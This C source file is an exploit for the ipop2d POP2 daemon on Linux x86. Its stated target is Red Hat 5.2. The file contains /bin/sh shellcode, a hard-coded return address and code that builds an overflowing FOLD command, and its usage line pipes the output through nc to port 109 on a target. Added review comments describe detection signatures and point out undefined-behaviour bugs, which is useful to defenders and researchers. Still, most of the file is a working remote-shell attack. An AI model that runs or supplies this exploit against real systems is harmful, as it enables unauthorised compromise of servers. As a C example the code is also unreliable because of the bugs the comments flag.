/*
 * *working* ipop2d exploit for linux/x86
 * tested on redhat 5.2
 *
 * - rsh <dmk@slack.net>
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Raw x86 machine-code payload that main() copies byte-for-byte into the
 * tail of the overflow buffer. The bytes are opaque from this file apart
 * from the trailing "/bin/sh" literal; nothing here decodes them.
 * Detection note: this exact byte pattern inside a POP2 command argument,
 * or the long 0x90 run that precedes it, is a signature for this attack.
 */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";


/*
 * Fixed guess of the address written over the daemon's saved return
 * address; the optional argv[4] offset is subtracted from it in main().
 * Presumably meant to land inside the 0x90 filler -- cannot be confirmed
 * from this file. A hard-coded stack address is only valid for the single
 * build/environment named in the file header; any stack randomization or
 * a different stack layout invalidates it.
 */
#define RET 0xbffff5a8

/*
 * Build the POP2 HELO/FOLD lines for the overflow and write them to stdout;
 * the usage string expects stdout to be piped into a network client, so this
 * program itself never opens a connection.
 *
 * argv[1..3]: auth, user and password placed in the HELO line.
 * argv[4]   : optional decimal offset subtracted from RET.
 * Exits with status 1 on missing arguments; otherwise falls off the end of
 * main (C99 treats that as returning 0).
 *
 * NOTE(review): strlen/memset are used without <string.h> and u_long without
 * <sys/types.h>; the file relies on implicit declarations that modern
 * compilers reject. There is also no check that b stays positive when
 * argv[1]/argv[2] are long, so buf could then be indexed negatively (UB).
 */
int
main (int argc, char *argv[])
{
  char buf[1099];
  int off = 0, b = 1024, i, a = 0;
  u_long *p;

  if (argc < 4)
    {
      fprintf (stderr, "use: (%s <auth> <user> <pw> [offset];cat) | nc"
	       " <target> 109\n", argv[0]);
      exit (1);
    }
  /* argv[argc] is guaranteed NULL, so with exactly four arguments this is false. */
  if (argv[4])
    off = atoi (argv[4]);
  /* Shrink the payload by the auth/user lengths plus a fixed 17 bytes --
     presumably what the server prepends before the FOLD argument; the
     constant is not explained in this file. */
  b -= strlen (argv[1]) + strlen (argv[2]) + 17;
  fprintf (stderr, "{!} buf size\t: %d\n{!} ret addr\t: %#x\n\n", b,
	   RET - off);
  /* Whole buffer pre-filled with 0x90 (x86 NOP); a long run of this byte in
     a POP2 argument is the classic IDS signature for this payload. */
  memset (buf, 0x90, sizeof (buf));
  /* Copy the payload so its last byte sits at index b+3. If
     strlen(shellcode) > b+4 the start index wraps (unsigned subtraction)
     and the loop body runs with i < 0 -- there is no guard. */
  for (i = ((b + 4) - strlen (shellcode)); i < (b + 4); i++)
    buf[i] = shellcode[a++];
  /* Store the 4-byte address right after the payload through a u_long
     pointer into a char array: a type-punned, possibly unaligned store
     (memcpy would be the well-defined form). */
  p = (u_long *) (buf + (b + 4));
  *p = (RET - off);
  /* NUL after the address so the %s below stops at the end of the payload. */
  buf[b + 4 + 4] = '\0';
  printf ("HELO %s:%s %s\r\n", argv[1], argv[2], argv[3]);
  /* Presumably gives the server time to process HELO before FOLD arrives. */
  sleep (10);
  printf ("FOLD %s\r\n", buf);
}

